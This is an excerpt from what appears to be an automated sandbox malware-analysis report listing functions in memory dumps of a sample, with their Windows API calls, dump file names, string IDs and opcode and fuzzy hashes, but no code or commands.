                                                  Control-flow Graph: function starting at 6688a60 (graph node data omitted)
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fcq$XPcq
                                                  • API String ID: 0-936005338
                                                  • Opcode ID: 61fa0cf3133fb74bcfbb8856481e7a71aeef56e509fbafe409d2cd90d78271c7
                                                  • Instruction ID: 334dfea131db292eff3cbdb81f0f7c22bfd2537c3767c5bae3eab23011492da9
                                                  • Opcode Fuzzy Hash: 61fa0cf3133fb74bcfbb8856481e7a71aeef56e509fbafe409d2cd90d78271c7
                                                  • Instruction Fuzzy Hash: 0B417470B002199FEB54AFB8C4547AEBAE7EF88740F208529D545EB3D4DE748C02CB96

                                                  Control-flow Graph: function starting at 138ae98, three basic blocks, calls DuplicateHandle (graph node data omitted)
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0138AF1F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2901155834.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1380000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: ee1b61acb3954a4774c9d193338b814d96c4048f9825809debac483a679d63da
                                                  • Instruction ID: 2250210eb6e14a9b0329345c998328c067c8d36f687d624e407c1a2128e38c79
                                                  • Opcode Fuzzy Hash: ee1b61acb3954a4774c9d193338b814d96c4048f9825809debac483a679d63da
                                                  • Instruction Fuzzy Hash: 9721E4B59002489FDB10CFAAD984ADEFFF4EB48314F14841AE954A7350D374A944CFA5

                                                  Control-flow Graph: function starting at 138ae90, three basic blocks, calls DuplicateHandle (graph node data omitted)
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0138AF1F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2901155834.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1380000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: ae2a797d086e4461e40e74565c582ac34feba3bb2d52d43fc475f2c960c9d029
                                                  • Instruction ID: 763fa80d955a2a43f9c864abe7f6fe09d163a0e0028d096ded3471c60dc1cc9e
                                                  • Opcode Fuzzy Hash: ae2a797d086e4461e40e74565c582ac34feba3bb2d52d43fc475f2c960c9d029
                                                  • Instruction Fuzzy Hash: 642100B5D002089FDB10CFA9D984AEEBFF4EB48320F14845AE918A3250D374A944CFA5

                                                  Control-flow Graph: function starting at 6603f71, four basic blocks, calls GlobalMemoryStatusEx (graph node data omitted)
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 06603FDF
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912583579.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6600000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: ab6d14eee20be3667dcb9e9e101b9b7309acd12178da7066217ae14d0411d0b2
                                                  • Instruction ID: bc8d90c9b801ff8cb7fc493a1826e180837ed2e7dc90fc46d6348a400a3a1aca
                                                  • Opcode Fuzzy Hash: ab6d14eee20be3667dcb9e9e101b9b7309acd12178da7066217ae14d0411d0b2
                                                  • Instruction Fuzzy Hash: 9D1103B1C0025A9BCB10CF9AC445BDEFBF4AF48320F14816AE818B7341D778A944CFA6
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 06603FDF
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912583579.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6600000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 2c9e9b3da0be995f82dd12d933e15529173934e265af569f89e897631fb48697
                                                  • Instruction ID: b699b0a33bfebdd1b391ba07e653aa0c1b572e5b031041a13fc977923e0bba2d
                                                  • Opcode Fuzzy Hash: 2c9e9b3da0be995f82dd12d933e15529173934e265af569f89e897631fb48697
                                                  • Instruction Fuzzy Hash: CF11E2B1C0065A9BDB10DF9AC544BDEFBF4AF48324F14816AD818B7250D778A944CFA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH^q
                                                  • API String ID: 0-2549759414
                                                  • Opcode ID: 4e4c6fb62affef60c251dde33f46f6338beaef8c43728397663d8cdae0be6f4b
                                                  • Instruction ID: bda60fe54a043b957d99ced450e55e407432dca83718e56c05df8ccd9cf62696
                                                  • Opcode Fuzzy Hash: 4e4c6fb62affef60c251dde33f46f6338beaef8c43728397663d8cdae0be6f4b
                                                  • Instruction Fuzzy Hash: 9641D530B003019FDB55AB74C8246AF76E7AF85200F644669E406DB395DF39DD46CBA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH^q
                                                  • API String ID: 0-2549759414
                                                  • Opcode ID: ad47ea4a00aab045d2905c0d4590a78c923644af195a3fb6d8fc11fb41cbb5c7
                                                  • Instruction ID: b6abc6613c7220362f8274e1099a54f1dfeebc4b8761ae09514529ebb8bfbce6
                                                  • Opcode Fuzzy Hash: ad47ea4a00aab045d2905c0d4590a78c923644af195a3fb6d8fc11fb41cbb5c7
                                                  • Instruction Fuzzy Hash: F731B430B002058FDB59BB78C52466F76E7AFC5200F205679E006DB395EE79DC46CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: \Ocq
                                                  • API String ID: 0-2995510325
                                                  • Opcode ID: a68b85211103dcacec5ff9120112dc3b8363a8ede09281f8b547d876adc42ceb
                                                  • Instruction ID: 33a8125bc858a023cc1c0beec107273b0c3b8b9534c459970d9d8f28c85dc607
                                                  • Opcode Fuzzy Hash: a68b85211103dcacec5ff9120112dc3b8363a8ede09281f8b547d876adc42ceb
                                                  • Instruction Fuzzy Hash: 8DF0B730A5012ADFDB149FA4E859BAEBB72BF84700F604119E002A7294CBB51C41CB81
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e871b11c4e3698fbb4b9626c35923bad872726e0181bcd7bab87b18d11283bf2
                                                  • Instruction ID: 0f266fc8cc856f322973de07398015617459dbfe923373e323bba4b53520b5ba
                                                  • Opcode Fuzzy Hash: e871b11c4e3698fbb4b9626c35923bad872726e0181bcd7bab87b18d11283bf2
                                                  • Instruction Fuzzy Hash: 82A16330F102099FDF64AABCC5947AEB6E6EB89350F204925E409EB395DA35DC81C762
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b3d84010f65753a8ddaee0b408c429d04ff02c0b0a25a80a189a25b7c908e9b8
                                                  • Instruction ID: 705931465baa4225a3fef9462e12a7ab6fa91c72d4a0f388da484ffff85b7f94
                                                  • Opcode Fuzzy Hash: b3d84010f65753a8ddaee0b408c429d04ff02c0b0a25a80a189a25b7c908e9b8
                                                  • Instruction Fuzzy Hash: 70A1D470F002129FDB15EFB8C480A6EBBA6FB84710F148669D456EB395DB35DC82C792
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1016dbdd12a7f1fc9766213c46c82f5fa4ac43647fd13f770eeec6ea117efae8
                                                  • Instruction ID: 863368144480b65c7acbed1e371907d164de6c4db35dbb96e734826072135eb7
                                                  • Opcode Fuzzy Hash: 1016dbdd12a7f1fc9766213c46c82f5fa4ac43647fd13f770eeec6ea117efae8
                                                  • Instruction Fuzzy Hash: E6914D31B006069FDB54EBB8C46476EB7E7AFC9304F548629D40AEB384EE74DC428B91
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 85706acad6305a969e3ba48d55a19c19dea38c335fe36fb0d3b3f61fbffb0e3f
                                                  • Instruction ID: f966617361b595bba3c0dfc598a836b1658e6b9ece1aab67e47378a860929f88
                                                  • Opcode Fuzzy Hash: 85706acad6305a969e3ba48d55a19c19dea38c335fe36fb0d3b3f61fbffb0e3f
                                                  • Instruction Fuzzy Hash: A4814C30F006065FDB54EBB9C46476EB6E7AF89304F508629D40AEB384EE74DC428B92
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7a4d8f9871e95fddf6c2541ed9fa1ac08439d8c8c48a8eedc5df35c5ad5bf69c
                                                  • Instruction ID: 638582800d62667cb2e205516b69aa8f8957adde1ccd331fd7608fa392e0d07e
                                                  • Opcode Fuzzy Hash: 7a4d8f9871e95fddf6c2541ed9fa1ac08439d8c8c48a8eedc5df35c5ad5bf69c
                                                  • Instruction Fuzzy Hash: D261F371F001114FCB51AABEC8846AFEAD7AFD5220B15413AD80EDB360EEA5DD0287D2
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7ec790a646a2dc9f80f1e01abd023380dd947188919375230bf3f3fdb4fae559
                                                  • Instruction ID: fa5abd7b4f470c3b8f2bac95132eed67912bef33c76f6a22b467e237495d3687
                                                  • Opcode Fuzzy Hash: 7ec790a646a2dc9f80f1e01abd023380dd947188919375230bf3f3fdb4fae559
                                                  • Instruction Fuzzy Hash: 86913E30E1021A8FDB60DF68C890B9DB7B1FF89300F608699D549AB355DB70AE85CF91
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b78dc9d77cab2a51e8dd80597b35ff691a0e390db585ca47407a5a4c7f8edea8
                                                  • Instruction ID: 6c47c4f30628375d4b979403cd47aa14635d5f14c119970b5863bf070f7de02e
                                                  • Opcode Fuzzy Hash: b78dc9d77cab2a51e8dd80597b35ff691a0e390db585ca47407a5a4c7f8edea8
                                                  • Instruction Fuzzy Hash: D7913C30E1021A8FDB60DF68C890B9DB7B1FF89300F608699D549AB355DB70AA85CF91
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dc71d33212f864b5fe1567cbca8baae1e6fae8eab5267fd0160296be7cf5bc4f
                                                  • Instruction ID: b4d9054b95e8f6e22f2a387ebae81b85adfc577460e27894efccd4eee619d873
                                                  • Opcode Fuzzy Hash: dc71d33212f864b5fe1567cbca8baae1e6fae8eab5267fd0160296be7cf5bc4f
                                                  • Instruction Fuzzy Hash: 97412C71E006099FDB70DEADD880ABEFBB2FB85310F104A2AD15AD7650D331A955CB91
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 31cde8ea3b974a59d1c46e2ad89995138b3e7bc1887b5e269133d1b9af6af835
                                                  • Instruction ID: ae295a1d76d99a8a66ec30212773a8a2b208390b58cba857beb242b1449dcbca
                                                  • Opcode Fuzzy Hash: 31cde8ea3b974a59d1c46e2ad89995138b3e7bc1887b5e269133d1b9af6af835
                                                  • Instruction Fuzzy Hash: E3317E30E002099FCB55DFA9D994A9EB7F6BF89300F108619E806EB355DB71AC46CB90
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f53e3861bbdc7d5a9b7260bd5ad679b901a6fc0d34b6bd8ee7ecb19a7142df5
                                                  • Instruction ID: 1ce0c12bbfe6baf3a0c0c2374b70568b60f9e54f8203a244c0b58e83f1b16ed3
                                                  • Opcode Fuzzy Hash: 6f53e3861bbdc7d5a9b7260bd5ad679b901a6fc0d34b6bd8ee7ecb19a7142df5
                                                  • Instruction Fuzzy Hash: E7314D30E102199FCF55DFA9D59469EB7F2BF89310F108629E806E7355DB71AC42CB90
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 859731554e71613bc8b5c9107ef9eadd83e370046a4f98ce680d25496d31ce02
                                                  • Instruction ID: 49b41e5d61206daebfbce078e1fdeaec4a472b0c9b7d60aca99951d02fcd97e1
                                                  • Opcode Fuzzy Hash: 859731554e71613bc8b5c9107ef9eadd83e370046a4f98ce680d25496d31ce02
                                                  • Instruction Fuzzy Hash: F6319171F003159FDB50EFBC88507BEBAF2AB48610F64816AD509F7390EA70CD0287A1
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e77e67f6ccfb99257ebc66339330d453e6b276d9a88eae41fe9d647a4225e43b
                                                  • Instruction ID: 97177cc561321b30445a3c66ec92dbbda3724fffb4743c3d3054a9c387f51976
                                                  • Opcode Fuzzy Hash: e77e67f6ccfb99257ebc66339330d453e6b276d9a88eae41fe9d647a4225e43b
                                                  • Instruction Fuzzy Hash: B031C131F013119FDB50EF78C8507BEBAE29F48214F24856AE949F7380EA74CC028BA5
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2899199979.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_10bd000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1f31862b40ad6323c0c4160248301e75ddc4c1b99b32e41fe54c8394091968ff
                                                  • Instruction ID: d19611b9d146c5d2974e4616c879b4fedd6c6e7ce0d84e18114e766d8b125fff
                                                  • Opcode Fuzzy Hash: 1f31862b40ad6323c0c4160248301e75ddc4c1b99b32e41fe54c8394091968ff
                                                  • Instruction Fuzzy Hash: 70212271614200DFCB15DF98D9C4B6AFFA5EB88318F20C5ADE98A4B256C33AD447CB61
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b458d89ae4c9ace00341c560ced3259639f7bb7a999dc027368ba54ffa158bd8
                                                  • Instruction ID: 3ff43a401c3d5532fc0030f61dca7126e88293687110c9b19be08df47a937521
                                                  • Opcode Fuzzy Hash: b458d89ae4c9ace00341c560ced3259639f7bb7a999dc027368ba54ffa158bd8
                                                  • Instruction Fuzzy Hash: F911C232F002156FDB54F6B888546BF76EB9BC8250B20457AD50AE7340EE61DD0387A2
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f88ca60ef0cc0f98e3d7ed6bc7e7c25c481e0a04f6e0093ba406ec7e88abd57f
                                                  • Instruction ID: 8d0dc519cd626d85d7717422ab620334bb41d7bb857d6efd6076050db3a1635c
                                                  • Opcode Fuzzy Hash: f88ca60ef0cc0f98e3d7ed6bc7e7c25c481e0a04f6e0093ba406ec7e88abd57f
                                                  • Instruction Fuzzy Hash: 13112530B013151FCB65BA78D914BAF37DADB86310F118629F60ACB381ED26DC0287E1
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3fa44acaa8df91d49db799f85d7fe98f4d9e4b6b1eb4fb51731d86372f69de1c
                                                  • Instruction ID: c1f6912b89e80bf0106c7c74f7b6867e8a7b7540d979093d059b884af3e2cd5b
                                                  • Opcode Fuzzy Hash: 3fa44acaa8df91d49db799f85d7fe98f4d9e4b6b1eb4fb51731d86372f69de1c
                                                  • Instruction Fuzzy Hash: 69115931A047099FCB20DFAADCC59AFFFF6AF85300B144A2AD15597651D770A845CBA0
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4919f10b593bd6ebf10dd96bd667d4d1b81d99e1d4bd14b9d843729c30667419
                                                  • Instruction ID: 7b6ef705f6a35f3f4729a4f2eb14dd53429e21c5fa1f5da4ad8a47ac80d93773
                                                  • Opcode Fuzzy Hash: 4919f10b593bd6ebf10dd96bd667d4d1b81d99e1d4bd14b9d843729c30667419
                                                  • Instruction Fuzzy Hash: D411C432B011052FDB64EA78D8507EF77EB8BC9250F60013AE10AE3381EE619C0387E2
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bea52d243df04fb748a5e76906264e8778f966977545a05e7b4733088625cf68
                                                  • Instruction ID: 194741713d11ab8f240a8d4038df50155e8c3e2f73c158354235ab78406efb30
                                                  • Opcode Fuzzy Hash: bea52d243df04fb748a5e76906264e8778f966977545a05e7b4733088625cf68
                                                  • Instruction Fuzzy Hash: B4216F30E002199FCF54EBB9D9546DEBBF5EB49310F2045A9E509E7350DA32D941CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2899199979.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_10bd000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6ec627737c72ebf0be575fd3678bb0d01979ac911e8fce1a5ebf27f0bf695c29
                                                  • Instruction ID: dee948e5d5e0957d1fc3baed9601f58d4d2648c21173e58b71d4bbb22aa177f9
                                                  • Opcode Fuzzy Hash: 6ec627737c72ebf0be575fd3678bb0d01979ac911e8fce1a5ebf27f0bf695c29
                                                  • Instruction Fuzzy Hash: 772153755083809FDB12CF54D9D4711BFB1EB46214F28C5DAD8898F2A7C33A9856CB62
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f4a1826d0ed7da74d51b69e119d21f1f5b2037a6d2f43536b990c6540e21770f
                                                  • Instruction ID: 8e0d72366fdc5a58ea062587aacb20af536031d6fca25c5eb8cc342a600e6b77
                                                  • Opcode Fuzzy Hash: f4a1826d0ed7da74d51b69e119d21f1f5b2037a6d2f43536b990c6540e21770f
                                                  • Instruction Fuzzy Hash: 4101D231B041520FDB95A67EE86076AABDADBCA710F14857EE04EC7392DD21CC468381
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a35d27a4ff0e6f14648972375668a436742b2ee008986697c5d7895a3fd0c140
                                                  • Instruction ID: 9d1bf712d0054e0b530f85c13035d8249762019e2a33dbf8cbbcefe11f39467c
                                                  • Opcode Fuzzy Hash: a35d27a4ff0e6f14648972375668a436742b2ee008986697c5d7895a3fd0c140
                                                  • Instruction Fuzzy Hash: CA21C2B5D01259AFCB00DFAAD884ADEFFB8FB49310F10812AE518A7740C374A954CFA5
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d54eeabbaedbe6f6e4d2523b06f72d1c6b9db071f8e081cb4c40556cad17ee3
                                                  • Instruction ID: 54c4a13165278a0c33fd7bcda75abbf194355857c83508224a2e5e6817952d52
                                                  • Opcode Fuzzy Hash: 7d54eeabbaedbe6f6e4d2523b06f72d1c6b9db071f8e081cb4c40556cad17ee3
                                                  • Instruction Fuzzy Hash: A421C0B1D01259AFCB00DF9AD884ADEFFB4FB49310F20812AE918A7240D374A954CFA5
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ad1766f574f33de068dc4ab31d20cb5f89838382a5b8129338be44c83d8623ed
                                                  • Instruction ID: 6134b3c2cf8f75cd81fed85b63d40bee27ef32f029d15ce22e35224e99bf1a85
                                                  • Opcode Fuzzy Hash: ad1766f574f33de068dc4ab31d20cb5f89838382a5b8129338be44c83d8623ed
                                                  • Instruction Fuzzy Hash: E001AD31B101120FDB64A57EE894B2BA3CADBCA720F20893DE10EC7344DE65DC428791
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f789e6956d51debf2d2b241d679cf08cacd627efb77347f24ba05b8527501849
                                                  • Instruction ID: c5e06dea255c004bb55358fe0c5ef3e9301f64e0d64900aa82ced6666242098d
                                                  • Opcode Fuzzy Hash: f789e6956d51debf2d2b241d679cf08cacd627efb77347f24ba05b8527501849
                                                  • Instruction Fuzzy Hash: 19018630B003151FDB64B67DE55476F72D6DB89714F508529E10BC7344ED66DC0287D5
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2899081030.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_10ad000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 989342b1c02299801d5fe53baedd82c2a5d5d5068184ecf0301c8ee23b5b43a8
                                                  • Instruction ID: 28c0e5af1668ebb98b84121ab27f045d3a2f3464a3fb7e44468eda543a5ace84
                                                  • Opcode Fuzzy Hash: 989342b1c02299801d5fe53baedd82c2a5d5d5068184ecf0301c8ee23b5b43a8
                                                  • Instruction Fuzzy Hash: 96F062714083449AE7118A5AD884B66FFE8EF45724F18C49AED4C4E687C3799844DBB1
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f383a34d181c8a12badac849a21f5eea616b2b200d67f809cf3f80fa88266df1
                                                  • Instruction ID: 579074f6ffd1ab69ad8b127f177eb33dba22b7f4482a0f1c4210ba9662d7c447
                                                  • Opcode Fuzzy Hash: f383a34d181c8a12badac849a21f5eea616b2b200d67f809cf3f80fa88266df1
                                                  • Instruction Fuzzy Hash: 0BF06531D19248EFDB60DEB4D98174A7BA9DB02204F20499AD884C7202E576DD01C791
                                                  Memory Dump Source
